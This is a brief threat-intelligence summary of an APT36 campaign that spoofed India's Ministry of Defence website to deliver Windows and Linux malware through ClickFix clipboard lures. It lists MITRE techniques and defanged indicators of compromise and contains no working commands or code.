Threat actors used branding spoofing to deliver cross-platform malware targeting Indian government infrastructure. They mimicked official press releases and employed ClickFix techniques to execute malicious commands silently. (Affected: Indian government, security, victims of malware)
Keypoints :
- Threat actors are resorting to recognizable government branding to disguise malware execution.
- A fake website imitating India’s Ministry of Defence was found serving cross-platform malware.
- Cloned content included press release archives with mostly inactive links.
- The malware delivery used ClickFix-style social engineering techniques.
- Windows and Linux systems targeted differently using clipboard commands.
- Indicators confirmed involvement of APT36 through unique methods and HTML techniques.
- Campaign reflects a lack of advanced techniques but shows intent and strategic planning.
MITRE Techniques :
- **T1566 – Phishing**: Spoofed government press release portal used to lure victims into executing commands.
- **T1059.001 – JavaScript**: JavaScript used on Windows to silently copy malicious commands to clipboard for execution.
- **T1071.001 – Application Layer Protocol: Web Protocols**: Used HTTP for communication with malicious infrastructure.
- **T1218.001 – Signed Binary Proxy Execution**: Exploited mshta.exe for executing the payload on Windows systems.
Indicator of Compromise :
- The article mentions two IP addresses, 192.64.118[.]76 and 185.117.90[.]212, linked to malicious infrastructure.
- Domains such as email.gov.in.drdosurvey[.]info and email.gov.in.avtzyu[.]store indicated as part of the attack.
- The HTA file named sysinte.hta associated with the Windows delivery technique has a specific SHA-256 hash.
- Observations of URLs imitating legitimate government sites signal possible phishing attempts.
Full Story: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence
Views: 117